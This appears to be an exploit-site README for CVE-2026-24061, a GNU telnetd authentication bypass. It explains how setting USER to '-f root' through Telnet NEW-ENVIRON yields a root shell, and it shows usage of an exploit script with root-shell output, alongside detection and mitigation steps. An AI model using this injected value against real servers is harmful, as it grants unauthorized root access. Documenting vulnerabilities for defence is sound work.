## https://sploitus.com/exploit?id=6071C7FC-18EE-508F-8E57-5928C4D949E0
# CVE-2026-24061: GNU Telnetd Authentication Bypass
## overview
CVE-2026-24061 is a critical authentication bypass vulnerability in GNU telnetd that allows remote attackers to gain root access without credentials.
- CVSS Score: 9.8 (Critical)
- Affected Versions: GNU telnetd up to version 2.7-2
- Discovered By: Kyu Neushwaistein (Carlos Cortes Alvarez) - January 2026
- Impact: Remote Code Execution as root without authentication
## vulnerability details
The vulnerability was introduced in 2015 with the addition of a `%U` placeholder in the login invocation string. This placeholder is replaced with the USER environment variable, which attackers control through the Telnet NEW-ENVIRON option. By setting USER to "-f root", attackers inject the `-f` flag into `/usr/bin/login`, which skips authentication entirely.
## root cause
The vulnerable code path:
1. telnetd.c defines: `LOGIN_INVOCATION "%U%p"`
2. %U expands to `getenv("USER")`
3. Attacker controls USER via Telnet NEW_ENVIRON option
4. Server executes: `/usr/bin/login -f root`
5. The `-f` flag skips authentication, granting root access
## attack flow
```
Client connects โ Server requests NEW_ENVIRON โ
Client sends USER="-f root" โ Server runs /usr/bin/login -f root โ
Root shell granted
```
## running the exploit
Basic usage:
```bash
python3 main.py
python3 main.py -p 2323 # custom port
```
Example:
```bash
python3 main.py 192.168.1.100
# [*] Connected to 192.168.1.100:23
# root@vulnerable:~# whoami
# root
```
## setting up test env
Method 1 - Docker (Recommended):
```bash
cd docker-setup
docker build -t vulnerable-telnetd .
docker run -d -p 2323:23 vulnerable-telnetd
```
Method 2 - Install vulnerable package:
```bash
sudo apt-get install inetutils-telnetd=2:2.0-1ubuntu1
echo "telnet stream tcp nowait root /usr/sbin/telnetd telnetd" | sudo tee -a /etc/inetd.conf
sudo service inetd restart
```
## detection
Network monitoring:
```bash
tcpdump -i any -n 'tcp port 23' -A | grep -i "NEW_ENVIRON"
```
Log analysis:
```bash
grep "/usr/bin/login -f" /var/log/auth.log
grep "session opened for user root" /var/log/auth.log
```
## mitigation
Immediate actions:
1. Update GNU telnetd:
```bash
sudo apt-get update && sudo apt-get install inetutils-telnetd
```
2. Disable Telnet:
```bash
sudo systemctl stop telnetd
sudo systemctl disable telnetd
```
3. Replace with SSH:
```bash
sudo apt-get install openssh-server
```
Long-term: Eliminate Telnet usage, migrate to SSH, implement network segmentation, and block port 23.
## LEGAL DISCLAIMER
This material is for educational and authorized security testing only. Only test systems you own or have explicit written permission to test. Unauthorized access is illegal.
## References
- CVE Entry: https://vulners.com/cve/CVE-2026-24061
- Telnet Protocol (RFC 854): https://tools.ietf.org/html/rfc854
- Telnet Environment Option (RFC 1572): https://tools.ietf.org/html/rfc1572
- SafeBreach Labs Analysis
Last Updated: 2026-03-06